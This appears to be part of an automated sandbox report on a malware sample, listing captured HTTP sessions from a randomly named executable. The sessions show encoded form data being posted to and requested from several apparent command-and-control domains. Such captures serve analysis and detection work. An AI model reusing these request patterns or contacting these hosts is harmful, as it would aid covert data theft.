                                                          Dec 3, 2024 14:26:30.000993013 CET364OUTGET /qygv/?MVWd=PNgLNtFNavTWVACj/R5fAEIERpwPFUn3Y2lvnmQ+PypmeASZv9aNxFxhHJqyS8bM8Pjr3wsa5/scE4diKg4WmoCRaQ8OoRB1M8xsODg9Mufe/exe8zzsMcFcs0FiYc3z1g==&kfm=dFj0Olb HTTP/1.1
                                                          Host: www.cyperla.xyz
                                                          Accept: */*
                                                          Accept-Language: en-us
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Dec 3, 2024 14:26:31.382671118 CET1236INHTTP/1.1 404 Not Found
                                                          Connection: close
                                                          cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                          pragma: no-cache
                                                          content-type: text/html
                                                          content-length: 1251
                                                          date: Tue, 03 Dec 2024 13:26:31 GMT
                                                          server: LiteSpeed
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                          Dec 3, 2024 14:26:31.382713079 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                          Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.849716194.76.119.6080516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:26:47.969553947 CET637OUTPOST /qx5d/ HTTP/1.1
                                                          Host: www.cstrategy.online
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.cstrategy.online
                                                          Content-Length: 205
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.cstrategy.online/qx5d/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Raw: 4d 56 57 64 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 78 64 31 62 75 6c 54 34 6b 37 44 56 4f 49 66 61 65 35 6a 50 48 7a 4d 77 72 6e 39 48 44 47 43 56 42 75 2b 44 35 62 70 4c 42 73 74 51 71 57 68 42 33 79 6c 68 46 4e 78 2f 49 62 6b 2f 55 44 39 38 47 73 64 52 6d 4f 76 70 4a 50 58 54 2b 46 52 70 35 69 74 6d 37 77 76 4f 46 79 46 2b 4b 2b 33 47 6a 5a 32 30 4c 6e 65 68 76 4d 6a 55 33 2f 78 44 6b 50 43 58 70 57 4d 4f 6c 30 41 75 39 49 51 45 77 61 74 64 51 79 47 65 74 52 30 4e 36 6e 63 64 46 4a 65 59 78 63 31 58 79 77 37 79 55 47 4a 4f 52 33 57 79 65 66 6b 62 6a 36 4b 66 77 73 6f 74 35 5a 49 65 75 68 70 2f 38 49 3d
                                                          Data Ascii: MVWd=Fw8woR6UyQnFDxd1bulT4k7DVOIfae5jPHzMwrn9HDGCVBu+D5bpLBstQqWhB3ylhFNx/Ibk/UD98GsdRmOvpJPXT+FRp5itm7wvOFyF+K+3GjZ20LnehvMjU3/xDkPCXpWMOl0Au9IQEwatdQyGetR0N6ncdFJeYxc1Xyw7yUGJOR3Wyefkbj6Kfwsot5ZIeuhp/8I=
                                                          Dec 3, 2024 14:26:49.226069927 CET391INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 03 Dec 2024 13:26:49 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 178
                                                          Connection: close
                                                          Location: https://www.cstrategy.online/qx5d/
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.849717194.76.119.6080516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:26:50.630589008 CET657OUTPOST /qx5d/ HTTP/1.1
                                                          Host: www.cstrategy.online
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.cstrategy.online
                                                          Content-Length: 225
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.cstrategy.online/qx5d/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Raw: 4d 56 57 64 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 51 74 31 64 4a 78 54 2f 45 37 4d 4c 2b 49 66 50 75 35 5a 50 48 50 4d 77 71 7a 58 48 32 32 43 51 51 65 2b 45 34 62 70 49 42 73 74 66 4b 57 6b 63 48 7a 49 68 46 52 35 2f 4a 33 6b 2f 55 58 39 38 44 49 64 52 52 79 73 6f 5a 50 56 61 65 46 54 6e 5a 69 74 6d 37 77 76 4f 42 61 76 2b 4f 53 33 46 54 70 32 30 71 6e 64 6f 50 4d 67 64 58 2f 78 4a 45 50 34 58 70 57 79 4f 6b 70 64 75 2f 41 51 45 77 71 74 64 68 79 48 56 74 52 79 48 61 6e 49 54 6b 34 41 43 53 51 31 62 44 59 35 74 57 57 55 4c 6e 47 38 6f 38 58 69 59 6a 53 68 66 7a 45 65 6f 4f 45 67 45 4e 78 5a 68 72 65 73 72 30 76 38 4c 55 67 36 38 30 72 72 66 36 5a 58 69 51 76 44
                                                          Data Ascii: MVWd=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH22CQQe+E4bpIBstfKWkcHzIhFR5/J3k/UX98DIdRRysoZPVaeFTnZitm7wvOBav+OS3FTp20qndoPMgdX/xJEP4XpWyOkpdu/AQEwqtdhyHVtRyHanITk4ACSQ1bDY5tWWULnG8o8XiYjShfzEeoOEgENxZhresr0v8LUg680rrf6ZXiQvD
                                                          Dec 3, 2024 14:26:51.983278990 CET391INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 03 Dec 2024 13:26:51 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 178
                                                          Connection: close
                                                          Location: https://www.cstrategy.online/qx5d/
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.849718194.76.119.6080516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:26:53.286070108 CET1674OUTPOST /qx5d/ HTTP/1.1
                                                          Host: www.cstrategy.online
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.cstrategy.online
                                                          Content-Length: 1241
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.cstrategy.online/qx5d/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Raw: 4d 56 57 64 3d 46 77 38 77 6f 52 36 55 79 51 6e 46 44 51 74 31 64 4a 78 54 2f 45 37 4d 4c 2b 49 66 50 75 35 5a 50 48 50 4d 77 71 7a 58 48 33 69 43 4d 79 47 2b 43 62 6a 70 4a 42 73 74 57 71 57 6c 63 48 79 4b 68 46 4a 39 2f 4a 72 30 2f 57 76 39 75 56 55 64 58 6c 6d 73 69 5a 50 56 58 2b 46 53 70 35 6a 6c 6d 37 67 72 4f 46 2b 76 2b 4f 53 33 46 51 78 32 39 62 6e 64 6b 76 4d 6a 55 33 2f 44 44 6b 4f 32 58 76 2b 45 4f 6b 63 71 75 75 67 51 46 51 36 74 61 43 61 48 59 74 52 77 41 61 6d 50 54 6b 30 68 43 53 4d 54 62 44 63 58 74 55 47 55 4c 51 7a 77 77 4e 48 49 4c 7a 43 32 52 52 6b 36 68 2b 6b 32 44 64 39 49 6c 35 2b 39 70 6a 6e 70 4d 6b 38 69 77 57 37 6c 44 4d 46 6b 67 31 79 31 6f 49 32 38 59 31 79 64 68 55 73 39 5a 67 46 5a 35 72 38 61 30 32 6a 71 71 36 37 33 50 6a 67 79 57 4f 61 76 61 45 72 77 33 6d 61 4d 35 44 46 4a 45 64 74 33 6c 62 6d 76 77 71 4b 2b 34 48 4f 54 53 6c 4a 2b 4b 48 2f 5a 49 35 39 62 75 56 79 54 6b 64 78 62 68 63 50 48 62 2b 66 34 2b 45 57 54 2b 4a 31 5a 4d 6c 78 55 6a 54 4e 5a 76 52 6e 76 56 [TRUNCATED]
                                                          Data Ascii: MVWd=Fw8woR6UyQnFDQt1dJxT/E7ML+IfPu5ZPHPMwqzXH3iCMyG+CbjpJBstWqWlcHyKhFJ9/Jr0/Wv9uVUdXlmsiZPVX+FSp5jlm7grOF+v+OS3FQx29bndkvMjU3/DDkO2Xv+EOkcquugQFQ6taCaHYtRwAamPTk0hCSMTbDcXtUGULQzwwNHILzC2RRk6h+k2Dd9Il5+9pjnpMk8iwW7lDMFkg1y1oI28Y1ydhUs9ZgFZ5r8a02jqq673PjgyWOavaErw3maM5DFJEdt3lbmvwqK+4HOTSlJ+KH/ZI59buVyTkdxbhcPHb+f4+EWT+J1ZMlxUjTNZvRnvV/nuvdH5iGgtTelP0OAq8muiqft5naxElSRZGlV681jST4M4XyUSJF+iVYRWH8vNilOpB5EUB66BvJpU5BX/7hfKttWNQbA9hi9b51PbI5LG+FjpKea2O6M/I5Ym/VEbO4uR4mSFwy6pFG/5XbRyxfuLR3kiS746sB1H5OJDJC4enC1n8baWqSz0gTrM2EO0oZrPO+cfnfkgAyxDcfoxOXGM6Okuo7C2agF2AwlARqKIps4TTRB6e0Nqbn0QFOyO7cgfnTVjJcRSz22Z15WZXIOTwexBQVNucRKs+MOCa6XQ9keqH0+PADsSx4qXzfAtp+m7wAXRiOt5VrFgDu3ZaLNNXbXVy76dImNVZY12g491dbF/JaBfCZBKBlCHvu320gfY8SLj9tIQZpEFg0EDvHsf87YTX+MObJqNkd/FCIRlxao6b+wRLAqye9zFCnqB/6R57tvrhdRcog7t5kqMgzy0DXyt1tolr7wJpmOm32eyCqxqunuNTlIRQgQVPJTomId/gOy2fwjixpR3r0w+6DDdj51utOKvbR7/773/8mtfEice1VoySP56y5lkNxJKF/gp2dQRhEAM9StjlZhySdRrNk2ptXD5XMkatdejqHQ10StB/ikwYYafLgv2x5Cw+vjgAxM81hflDr/6eSIwELb/BLsJvaqUoJU [TRUNCATED]
                                                          Dec 3, 2024 14:26:54.641143084 CET391INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 03 Dec 2024 13:26:54 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 178
                                                          Connection: close
                                                          Location: https://www.cstrategy.online/qx5d/
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.849720194.76.119.6080516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:26:55.953367949 CET369OUTGET /qx5d/?MVWd=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPvvTYRvxaqp7vn6p2LTuI6fSpdFMX3ZLUkPs/SWb4JECmGQ==&kfm=dFj0Olb HTTP/1.1
                                                          Host: www.cstrategy.online
                                                          Accept: */*
                                                          Accept-Language: en-us
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Dec 3, 2024 14:26:57.317573071 CET541INHTTP/1.1 301 Moved Permanently
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 03 Dec 2024 13:26:57 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 178
                                                          Connection: close
                                                          Location: https://www.cstrategy.online/qx5d/?MVWd=IyUQrkKyuirfHSYtNcNb8FX1VMdObdd7C0LSkI7uCAGWAT/RC+PuW1l2SNatEGXPklxe1J/nxX2px2UyQ1iPvvTYRvxaqp7vn6p2LTuI6fSpdFMX3ZLUkPs/SWb4JECmGQ==&kfm=dFj0Olb
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.849722103.224.182.24280516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:27:03.776510000 CET619OUTPOST /6ou6/ HTTP/1.1
                                                          Host: www.madhf.tech
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.madhf.tech
                                                          Content-Length: 205
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.madhf.tech/6ou6/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Raw: 4d 56 57 64 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4d 79 41 43 68 48 6f 43 65 74 65 32 61 66 4b 56 76 2f 48 4a 42 49 4b 31 37 34 31 67 65 67 4c 48 2f 6f 76 38 79 71 39 2f 49 67 50 45 58 32 32 33 4e 53 30 34 50 58 50 54 4b 36 34 65 30 46 71 2f 36 78 55 78 57 64 54 42 39 57 37 6a 2f 4e 46 6c 32 4d 68 64 35 49 70 68 50 45 62 37 51 37 36 2f 4b 73 73 6b 45 57 41 4b 55 4f 78 4a 4c 50 64 67 75 67 44 77 74 44 4e 62 53 6e 71 43 6d 31 65 36 43 39 39 4a 66 78 6d 75 45 4c 4c 6d 5a 6f 79 4e 6e 64 67 46 53 43 45 52 2f 52 65 73 64 32 4a 78 74 46 4e 6c 45 57 76 5a 56 42 56 31 4e 38 4d 6c 30 62 73 58 35 30 48 35 48 5a 49 3d
                                                          Data Ascii: MVWd=bcTWnB08V6+cMyAChHoCete2afKVv/HJBIK1741gegLH/ov8yq9/IgPEX223NS04PXPTK64e0Fq/6xUxWdTB9W7j/NFl2Mhd5IphPEb7Q76/KsskEWAKUOxJLPdgugDwtDNbSnqCm1e6C99JfxmuELLmZoyNndgFSCER/Resd2JxtFNlEWvZVBV1N8Ml0bsX50H5HZI=
                                                          Dec 3, 2024 14:27:05.017127991 CET871INHTTP/1.1 200 OK
                                                          date: Tue, 03 Dec 2024 13:27:04 GMT
                                                          server: Apache
                                                          set-cookie: __tad=1733232424.2662998; expires=Fri, 01-Dec-2034 13:27:04 GMT; Max-Age=315360000
                                                          vary: Accept-Encoding
                                                          content-encoding: gzip
                                                          content-length: 576
                                                          content-type: text/html; charset=UTF-8
                                                          connection: close
                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                          Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.849723103.224.182.24280516C:\Program Files (x86)\yjAxJHetqDRsidHqvGJLEyrzfgYdfynZCsNoLNMaoLwmRYeWrjES\jfBrBcvTIMPfDU.exe
                                                          TimestampBytes transferredDirectionData
                                                          Dec 3, 2024 14:27:06.441685915 CET639OUTPOST /6ou6/ HTTP/1.1
                                                          Host: www.madhf.tech
                                                          Accept: */*
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-us
                                                          Origin: http://www.madhf.tech
                                                          Content-Length: 225
                                                          Connection: close
                                                          Cache-Control: no-cache
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Referer: http://www.madhf.tech/6ou6/
                                                          User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                          Data Raw: 4d 56 57 64 3d 62 63 54 57 6e 42 30 38 56 36 2b 63 4f 57 45 43 74 41 38 43 57 74 65 78 5a 66 4b 56 6b 66 48 56 42 4a 32 31 37 35 77 37 65 56 6a 48 36 36 33 38 31 75 4a 2f 4e 67 50 45 63 57 32 49 44 79 30 76 50 58 44 78 4b 35 67 65 30 45 4b 2f 36 7a 4d 78 52 75 72 43 39 47 37 68 33 74 46 6a 37 73 68 64 35 49 70 68 50 41 7a 52 51 37 69 2f 4c 66 6b 6b 4c 53 55 4c 4c 2b 78 49 49 50 64 67 6c 41 44 30 74 44 4d 32 53 69 7a 66 6d 33 57 36 43 34 52 4a 66 6a 43 74 4f 4c 4c 6b 47 59 7a 6a 76 74 4a 70 55 79 67 2f 69 52 4f 77 66 32 4d 50 6f 7a 38 50 65 30 6e 66 57 42 39 65 4e 2f 6b 54 78 73 78 2f 6a 58 58 4a 5a 4f 65 2b 62 4b 77 41 4e 49 31 6d 74 30 6a 6e 46 6a 43 44 50 53 34 4f
                                                          Data Ascii: MVWd=bcTWnB08V6+cOWECtA8CWtexZfKVkfHVBJ2175w7eVjH66381uJ/NgPEcW2IDy0vPXDxK5ge0EK/6zMxRurC9G7h3tFj7shd5IphPAzRQ7i/LfkkLSULL+xIIPdglAD0tDM2Sizfm3W6C4RJfjCtOLLkGYzjvtJpUyg/iROwf2MPoz8Pe0nfWB9eN/kTxsx/jXXJZOe+bKwANI1mt0jnFjCDPS4O
                                                          Dec 3, 2024 14:27:07.710576057 CET871INHTTP/1.1 200 OK
                                                          date: Tue, 03 Dec 2024 13:27:07 GMT
                                                          server: Apache
                                                          set-cookie: __tad=1733232427.8390935; expires=Fri, 01-Dec-2034 13:27:07 GMT; Max-Age=315360000
                                                          vary: Accept-Encoding
                                                          content-encoding: gzip
                                                          content-length: 576
                                                          content-type: text/html; charset=UTF-8
                                                          connection: close
                                                          Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4e 51 ac 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 12 5b f2 24 3a 69 50 e4 bf 8f 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 8b 86 ba b6 8c 8a 06 65 c5 0f d2 d4 62 d9 c9 aa a9 33 42 d5 14 f9 29 12 15 5e 39 dd 13 d0 a1 47 11 13 de 53 be 91 3b 79 8a c6 e0 9d 12 71 be f1 79 ad cd 1a 5d ef b4 a1 5c eb 1a b3 4e 9b 6c e3 e3 b2 c8 4f d8 d7 52 95 d1 4e 3a 70 58 69 87 8a 7e b4 da 6c 41 40 d2 10 f5 cb 3c df ef f7 d9 b3 ba fc da 0e d7 f9 fb 64 15 45 79 0e b7 48 20 81 74 87 76 20 b0 35 5c 2d 16 d0 69 e5 ac 47 65 4d e5 81 2c e0 3d aa 81 90 81 8f 25 40 d7 40 0d c2 0b e5 d0 3b db 69 cf 31 a9 5b 0f b5 75 e0 6d 87 4c 91 de 9a a8 1e 8c 22 6d 0d 1f b7 ed 9d 54 db 9b 29 55 3a 87 87 68 b6 d7 a6 b2 fb ac b5 4a 06 54 e6 b0 6f a5 c2 f4 37 4f e7 49 dd 8b 8b 77 c9 7c 15 1d a3 88 dc 21 30 59 a5 27 70 95 fb 36 99 10 e0 91 a6 4d fa 67 b5 37 c1 20 f3 67 a1 61 75 ff 75 d2 2c e0 e3 b3 93 cf b7 ac 43 56 e9 43 67 8d 26 cb a1 f5 32 c8 f6 78 0c cc 27 56 [TRUNCATED]
                                                          Data Ascii: TMo0=pvNQ;a*[$:iPrm:]lQeb3B)^9GS;yqy]\NlORN:pXi~lA@<dEyH tv 5\-iGeM,=%@@;i1[umL"mT)U:hJTo7OIw|!0Y'p6Mg7 gauu,CVCg&2x'V4e=ekd;8pa?vAgNPSaEh)}v7?_BtI/G<pg+n4T#0z1m#nlkq&qI=?,X,$4kpZqP+rsc'7Ei9N\;DLbo)1;/He7


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
